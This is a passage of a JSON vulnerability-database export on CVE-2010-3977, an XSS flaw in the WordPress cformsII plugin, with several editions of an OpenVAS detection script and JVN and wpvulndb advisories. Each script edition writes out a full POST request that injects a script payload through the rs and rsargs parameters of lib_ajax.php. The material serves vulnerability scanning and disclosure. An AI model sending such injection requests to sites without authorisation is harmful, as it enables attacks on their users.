\",hostname,\"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded; charset=UTF-8\\r\\n\",\n \"Content-Length: 92\\r\\n\\r\\n\",\n \"rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#\",\n \"$<script>alert(1)</script>\\r\\n\");\nres = http_keepalive_send_recv(port:port, data:req);\n\n## Confirm exploit worked by checking the response\nif(('<script>alert(1)</script>' >< res) &&\n egrep(pattern:\"^HTTP/.* 200 OK\", string:res))\n{\n security_message(port:port);\n exit(0);\n}\n\nexit(99);", "naslFamily": "Web application abuses"}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2017-07-02T21:09:51"}, {"bulletin": {"id": "OPENVAS:1361412562310801628", "hash": "85bb946b18738e4c15863a2f77105b66771eb20eaa24f3a88db787388388b82f", "type": "openvas", "bulletinFamily": "scanner", "title": "WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities", "description": "This host is running cformsII WordPress Plugin and is prone to\n multiple HTML injection vulnerabilities.", "published": "2010-11-16T00:00:00", "modified": "2019-03-01T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801628", "reporter": "Copyright (C) 2010 Greenbone Networks GmbH", "references": ["http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/", "http://xforce.iss.net/xforce/xfdb/62938", "http://www.deliciousdays.com/cforms-plugin/", "http://secunia.com/advisories/42006"], "cvelist": ["CVE-2010-3977"], "lastseen": "2019-05-29T18:40:06", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"modified": "2019-05-29T18:40:06", "references": [{"idList": ["SSV:20225"], "type": "seebug"}, {"idList": ["CFORMS_RS_XSS.NASL"], "type": "nessus"}, {"idList": ["SECURITYVULNS:DOC:25042", "SECURITYVULNS:VULN:11223"], "type": "securityvulns"}, {"idList": ["EDB-ID:34946"], "type": "exploitdb"}, {"idList": ["CVE-2010-3977"], "type": "cve"}, {"idList": ["WPVDB-ID:8782"], "type": "wpvulndb"}, {"idList": ["PACKETSTORM:95395"], "type": "packetstorm"}, {"idList": ["JVN:35256978"], "type": "jvn"}]}, "score": {"modified": "2019-05-29T18:40:06", "value": 6.9, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310801628", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wordpress_mult_html_injection_vuln.nasl 13960 2019-03-01 13:18:27Z cfischer $\n#\n# WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#############################################################################\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801628\");\n script_version(\"$Revision: 13960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-01 14:18:27 +0100 (Fri, 01 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 10:37:01 +0100 (Tue, 16 Nov 2010)\");\n script_bugtraq_id(44587);\n script_cve_id(\"CVE-2010-3977\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/42006\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/62938\");\n script_xref(name:\"URL\", value:\"http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary\n code in the context of the application.\");\n script_tag(name:\"affected\", value:\"WordPress plugin cforms Version 11.5 and earlier.\");\n script_tag(name:\"insight\", value:\"The flaws are caused by improper validation of user-supplied\n input passed via the 'rs' and 'rsargs' parameters to\n wp-content/plugins/cforms/lib_ajax.php, which allows attackers to execute\n arbitrary HTML and script code on the web server.\");\n script_tag(name:\"solution\", value:\"Upgrade to cforms Version 11.6.1 or later.\");\n script_tag(name:\"summary\", value:\"This host is running cformsII WordPress Plugin and is prone to\n multiple HTML injection vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.deliciousdays.com/cforms-plugin/\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE)) exit(0);\nif(!dir = get_app_location(cpe:CPE, port:port)) exit(0);\n\nif (dir == \"/\") dir = \"\";\nhostname = http_host_name(port:port);\n\nreq = string(\"POST \",dir,\"/wp-content/plugins/cforms/lib_ajax.php HTTP/1.1\\r\\n\",\n \"Host: \",hostname,\"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded; charset=UTF-8\\r\\n\",\n \"Content-Length: 92\\r\\n\\r\\n\",\n \"rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#\",\n \"$<script>alert(1)</script>\\r\\n\");\nres = http_keepalive_send_recv(port:port, data:req);\n\nif(('<script>alert(1)</script>' >< res) &&\n egrep(pattern:\"^HTTP/.* 200 OK\", string:res))\n{\n security_message(port:port);\n exit(0);\n}\n\nexit(99);", "naslFamily": "Web application abuses"}, "differentElements": ["modified", "sourceData"], "edition": 5, "lastseen": "2019-05-29T18:40:06"}, {"bulletin": {"id": "OPENVAS:1361412562310801628", "hash": "7c8c9677975fe6224410b23e7e3793795c965cac246413ddd12f81027c90041f", "type": "openvas", "bulletinFamily": "scanner", "title": "WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities", "description": "This host is running cformsII WordPress Plugin and is prone to\n multiple HTML injection vulnerabilities.", "published": "2010-11-16T00:00:00", "modified": "2017-02-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801628", "reporter": "Copyright (C) 2010 Greenbone Networks GmbH", "references": ["http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/", "http://xforce.iss.net/xforce/xfdb/62938", "http://secunia.com/advisories/42006"], "cvelist": ["CVE-2010-3977"], "lastseen": "2018-08-30T19:27:58", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310801628", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wordpress_mult_html_injection_vuln.nasl 5388 2017-02-21 15:13:30Z teissa $\n#\n# WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#############################################################################\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801628\");\n script_version(\"$Revision: 5388 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-21 16:13:30 +0100 (Tue, 21 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 10:37:01 +0100 (Tue, 16 Nov 2010)\");\n script_bugtraq_id(44587);\n script_cve_id(\"CVE-2010-3977\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/42006\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/62938\");\n script_xref(name : \"URL\" , value : \"http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_tag(name : \"impact\" , value : \"Successful exploitation will allow attacker to execute arbitrary\n code in the context of the application.\n\n Impact Level: Application\");\n script_tag(name : \"affected\" , value : \"WordPress plugin cforms Version 11.5 and earlier.\");\n script_tag(name : \"insight\" , value : \"The flaws are caused by improper validation of user-supplied\n input passed via the 'rs' and 'rsargs' parameters to\n wp-content/plugins/cforms/lib_ajax.php, which allows attackers to execute\n arbitrary HTML and script code on the web server.\");\n script_tag(name : \"solution\" , value : \"Upgrade to cforms Version 11.6.1 or later.\n For updates refer to http://www.deliciousdays.com/cforms-plugin/\");\n script_tag(name : \"summary\" , value : \"This host is running cformsII WordPress Plugin and is prone to\n multiple HTML injection vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE)) exit(0);\nif(!dir = get_app_location(cpe:CPE, port:port)) exit(0);\n\nif (dir == \"/\") dir = \"\";\nhostname = http_host_name(port:port);\n\n## Construct POST attack request\nreq = string(\"POST \",dir,\"/wp-content/plugins/cforms/lib_ajax.php HTTP/1.1\\r\\n\",\n \"Host: \",hostname,\"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded; charset=UTF-8\\r\\n\",\n \"Content-Length: 92\\r\\n\\r\\n\",\n \"rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#\",\n \"$<script>alert(1)</script>\\r\\n\");\nres = http_keepalive_send_recv(port:port, data:req);\n\n## Confirm exploit worked by checking the response\nif(('<script>alert(1)</script>' >< res) &&\n egrep(pattern:\"^HTTP/.* 200 OK\", string:res))\n{\n security_message(port:port);\n exit(0);\n}\n\nexit(99);", "naslFamily": "Web application abuses"}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-30T19:27:58"}, {"bulletin": {"id": "OPENVAS:1361412562310801628", "hash": "92bd3f51d114d7f90be1aafbdd2833dc5c056100649f090265fa7cbf1dc695ec", "type": "openvas", "bulletinFamily": "scanner", "title": "WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities", "description": "This host is running cformsII WordPress Plugin and is prone to\n multiple HTML injection vulnerabilities.", "published": "2010-11-16T00:00:00", "modified": "2019-03-01T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801628", "reporter": "Copyright (C) 2010 Greenbone Networks GmbH", "references": ["http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/", "http://xforce.iss.net/xforce/xfdb/62938", "http://www.deliciousdays.com/cforms-plugin/", "http://secunia.com/advisories/42006"], "cvelist": ["CVE-2010-3977"], "lastseen": "2019-03-04T16:04:42", "history": [], "viewCount": 2, "enchantments": {"dependencies": {"modified": "2019-03-04T16:04:42", "references": [{"idList": ["SSV:20225"], "type": "seebug"}, {"idList": ["CFORMS_RS_XSS.NASL"], "type": "nessus"}, {"idList": ["SECURITYVULNS:DOC:25042", "SECURITYVULNS:VULN:11223"], "type": "securityvulns"}, {"idList": ["EDB-ID:34946"], "type": "exploitdb"}, {"idList": ["CVE-2010-3977"], "type": "cve"}, {"idList": ["WPVDB-ID:8782"], "type": "wpvulndb"}, {"idList": ["PACKETSTORM:95395"], "type": "packetstorm"}, {"idList": ["JVN:35256978"], "type": "jvn"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310801628", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wordpress_mult_html_injection_vuln.nasl 13960 2019-03-01 13:18:27Z cfischer $\n#\n# WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#############################################################################\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801628\");\n script_version(\"$Revision: 13960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-01 14:18:27 +0100 (Fri, 01 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 10:37:01 +0100 (Tue, 16 Nov 2010)\");\n script_bugtraq_id(44587);\n script_cve_id(\"CVE-2010-3977\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/42006\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/62938\");\n script_xref(name:\"URL\", value:\"http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary\n code in the context of the application.\");\n script_tag(name:\"affected\", value:\"WordPress plugin cforms Version 11.5 and earlier.\");\n script_tag(name:\"insight\", value:\"The flaws are caused by improper validation of user-supplied\n input passed via the 'rs' and 'rsargs' parameters to\n wp-content/plugins/cforms/lib_ajax.php, which allows attackers to execute\n arbitrary HTML and script code on the web server.\");\n script_tag(name:\"solution\", value:\"Upgrade to cforms Version 11.6.1 or later.\");\n script_tag(name:\"summary\", value:\"This host is running cformsII WordPress Plugin and is prone to\n multiple HTML injection vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.deliciousdays.com/cforms-plugin/\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE)) exit(0);\nif(!dir = get_app_location(cpe:CPE, port:port)) exit(0);\n\nif (dir == \"/\") dir = \"\";\nhostname = http_host_name(port:port);\n\nreq = string(\"POST \",dir,\"/wp-content/plugins/cforms/lib_ajax.php HTTP/1.1\\r\\n\",\n \"Host: \",hostname,\"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded; charset=UTF-8\\r\\n\",\n \"Content-Length: 92\\r\\n\\r\\n\",\n \"rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#\",\n \"$<script>alert(1)</script>\\r\\n\");\nres = http_keepalive_send_recv(port:port, data:req);\n\nif(('<script>alert(1)</script>' >< res) &&\n egrep(pattern:\"^HTTP/.* 200 OK\", string:res))\n{\n security_message(port:port);\n exit(0);\n}\n\nexit(99);", "naslFamily": "Web application abuses"}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2019-03-04T16:04:42"}], "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-3977"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11223", "SECURITYVULNS:DOC:25042"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:95395"]}, {"type": "jvn", "idList": ["JVN:35256978"]}, {"type": "nessus", "idList": ["CFORMS_RS_XSS.NASL"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:8CE453E5-6EAC-4991-BFAF-260D34E0A71B", "WPVDB-ID:8782"]}, {"type": "seebug", "idList": ["SSV:20225"]}, {"type": "exploitdb", "idList": ["EDB-ID:34946"]}], "modified": "2019-11-14T16:30:14", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2019-11-14T16:30:14", "rev": 2}}, "objectVersion": "1.4", "pluginID": "1361412562310801628", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#############################################################################\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801628\");\n script_version(\"2019-11-12T13:33:43+0000\");\n script_tag(name:\"last_modification\", value:\"2019-11-12 13:33:43 +0000 (Tue, 12 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 10:37:01 +0100 (Tue, 16 Nov 2010)\");\n script_bugtraq_id(44587);\n script_cve_id(\"CVE-2010-3977\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/42006\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/62938\");\n script_xref(name:\"URL\", value:\"http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary\n code in the context of the application.\");\n script_tag(name:\"affected\", value:\"WordPress plugin cforms Version 11.5 and earlier.\");\n script_tag(name:\"insight\", value:\"The flaws are caused by improper validation of user-supplied\n input passed via the 'rs' and 'rsargs' parameters to\n wp-content/plugins/cforms/lib_ajax.php, which allows attackers to execute\n arbitrary HTML and script code on the web server.\");\n script_tag(name:\"solution\", value:\"Update to cforms Version 11.6.1 or later.\");\n script_tag(name:\"summary\", value:\"This host is running cformsII WordPress Plugin and is prone to\n multiple HTML injection vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.deliciousdays.com/cforms-plugin/\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE)) exit(0);\nif(!dir = get_app_location(cpe:CPE, port:port)) exit(0);\n\nif (dir == \"/\") dir = \"\";\nhostname = http_host_name(port:port);\n\nreq = string(\"POST \",dir,\"/wp-content/plugins/cforms/lib_ajax.php HTTP/1.1\\r\\n\",\n \"Host: \",hostname,\"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded; charset=UTF-8\\r\\n\",\n \"Content-Length: 92\\r\\n\\r\\n\",\n \"rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#\",\n \"$<script>alert(1)</script>\\r\\n\");\nres = http_keepalive_send_recv(port:port, data:req);\n\nif(('<script>alert(1)</script>' >< res) &&\n egrep(pattern:\"^HTTP/.* 200 OK\", string:res))\n{\n security_message(port:port);\n exit(0);\n}\n\nexit(99);", "naslFamily": "Web application abuses", "_object_type": "robots.models.openvas.OpenVASBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.openvas.OpenVASBulletin"]}], "wpvulndb": [{"id": "WPVDB-ID:8CE453E5-6EAC-4991-BFAF-260D34E0A71B", "hash": "9ad9df4dc4c1aac83bddc72dd07b5a21", "type": "wpvulndb", "bulletinFamily": "software", "title": "Cforms <= 13.1 - 'lib_ajax.php' Cross-Site Scripting (XSS)", "description": "The cforms plugin has a XSS vulnerability in file lib_ajax.php with rs and rsargs[] parameters. It is fixed in version 13.2. The cforms2 fork was forked at 14.6, so it is not affected.\n", "published": "2010-11-01T00:00:00", "modified": "2019-11-01T10:12:33", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://wpscan.com/vulnerability/8ce453e5-6eac-4991-bfaf-260d34e0a71b", "reporter": "Bastian Germann", "references": ["https://packetstormsecurity.com/files/95395/", "https://www.securityfocus.com/bid/44587/", "https://vulners.com/exploitdb/EDB-ID:34946"], "cvelist": ["CVE-2010-3977"], "lastseen": "2021-02-15T22:32:49", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-3977"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11223", "SECURITYVULNS:DOC:25042"]}, {"type": "seebug", "idList": ["SSV:20225"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:95395"]}, {"type": "jvn", "idList": ["JVN:35256978"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801628"]}, {"type": "nessus", "idList": ["CFORMS_RS_XSS.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:34946"]}], "modified": "2021-02-15T22:32:49", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-02-15T22:32:49", "rev": 2}}, "objectVersion": "1.4", "affectedSoftware": [{"version": "13.2", "operator": "lt", "name": "cforms"}], "exploit": "", "sourceData": "", "generation": 1, "_object_type": "robots.models.wpvulndb.WPVulnDBBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.wpvulndb.WPVulnDBBulletin"]}], "jvn": [{"id": "JVN:35256978", "bulletinFamily": "info", "title": "JVN#35256978: cforms II vulnerable to cross-site scripting", "description": "\n ## Description\n\ncforms II provided by delicious days is a plugin for WordPress.\u00c2 cforms II contains a cross-site scripting vulnerability. \n\n\n ## Impact\n\nAn arbitrary script may be executed on the user's web browser. \n\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version according to the information provided by the developer. \n\n\n ## Products Affected\n\n * cforms II v13.1 and earlier\n", "published": "2012-02-15T00:00:00", "modified": "2012-02-15T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "http://jvn.jp/en/jp/JVN35256978/index.html", "reporter": "Japan Vulnerability Notes", "references": [], "cvelist": ["CVE-2010-3977"], "type": "jvn", "lastseen": "2021-07-28T14:34:18", "history": [{"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2010-3977"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {}, "cvss3": {}, "description": "\n ## Description\n\ncforms II provided by delicious days is a plugin for WordPress.\u00c2 cforms II contains a cross-site scripting vulnerability. \n\n\n ## Impact\n\nAn arbitrary script may be executed on the user's web browser. \n\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version according to the information provided by the developer. \n\n\n ## Products Affected\n\n * cforms II v13.1 and earlier\n", "edition": 80, "enchantments": {"dependencies": {"modified": "2019-05-29T17:21:47", "references": [{"idList": ["SSV:20225"], "type": "seebug"}, {"idList": ["WPVDB-ID:8782", "WPVDB-ID:8CE453E5-6EAC-4991-BFAF-260D34E0A71B"], "type": "wpvulndb"}, {"idList": ["CFORMS_RS_XSS.NASL"], "type": "nessus"}, {"idList": ["SECURITYVULNS:DOC:25042", "SECURITYVULNS:VULN:11223"], "type": "securityvulns"}, {"idList": ["OPENVAS:1361412562310801628"], "type": "openvas"}, {"idList": ["EDB-ID:34946"], "type": "exploitdb"}, {"idList": ["CVE-2010-3977"], "type": "cve"}, {"idList": ["PACKETSTORM:95395"], "type": "packetstorm"}], "rev": 2}, "score": {"modified": "2019-05-29T17:21:47", "rev": 2, "value": 6.7, "vector": "NONE"}}, "hash": "d0270da492a87d033b0a79905036db562446f31349326a25ef028b21d6f21920", "hashmap": [{"hash": "7b13c919e9b3911cd8a4f3c9eb1b6b33", "key": "modified"}, {"hash": "91d8e04282ee4b6b8c31c44a1de9e25f", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "933e37c2beeefe4a041a3b0ae38030c5", "key": "reporter"}, {"hash": "7d4bd26157ee0c2c2b44464519ca0fd9", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e2bd4f48ef6667ad18b60c1e8f34deb7", "key": "type"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "0ff8ac6c106c7d40ef6d150c8881d63a", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "24b9de688e7c9a27ad8f08d023cd5726", "key": "cvelist"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "7b13c919e9b3911cd8a4f3c9eb1b6b33", "key": "published"}], "history": [], "href": "http://jvn.jp/en/jp/JVN35256978/index.html", "id": "JVN:35256978", "immutableFields": [], "lastseen": "2019-05-29T17:21:47", "modified": "2012-02-15T00:00:00", "objectVersion": "1.5", "published": "2012-02-15T00:00:00", "references": [], "reporter": "Japan Vulnerability Notes", "title": "JVN#35256978: cforms II vulnerable to cross-site scripting", "type": "jvn", "viewCount": 11}, "different_elements": ["cvss2"], "edition": 80, "lastseen": "2019-05-29T17:21:47"}, {"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2010-3977"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "\n ## Description\n\ncforms II provided by delicious days is a plugin for WordPress.\u00c2 cforms II contains a cross-site scripting vulnerability. \n\n\n ## Impact\n\nAn arbitrary script may be executed on the user's web browser. \n\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version according to the information provided by the developer. \n\n\n ## Products Affected\n\n * cforms II v13.1 and earlier\n", "edition": 11, "enchantments": {"dependencies": {"modified": "2019-04-04T02:57:44", "references": [{"idList": ["SSV:20225"], "type": "seebug"}, {"idList": ["CFORMS_RS_XSS.NASL"], "type": "nessus"}, {"idList": ["SECURITYVULNS:DOC:25042", "SECURITYVULNS:VULN:11223"], "type": "securityvulns"}, {"idList": ["OPENVAS:1361412562310801628"], "type": "openvas"}, {"idList": ["EDB-ID:34946"], "type": "exploitdb"}, {"idList": ["CVE-2010-3977"], "type": "cve"}, {"idList": ["WPVDB-ID:8782"], "type": "wpvulndb"}, {"idList": ["PACKETSTORM:95395"], "type": "packetstorm"}]}, "score": {"value": 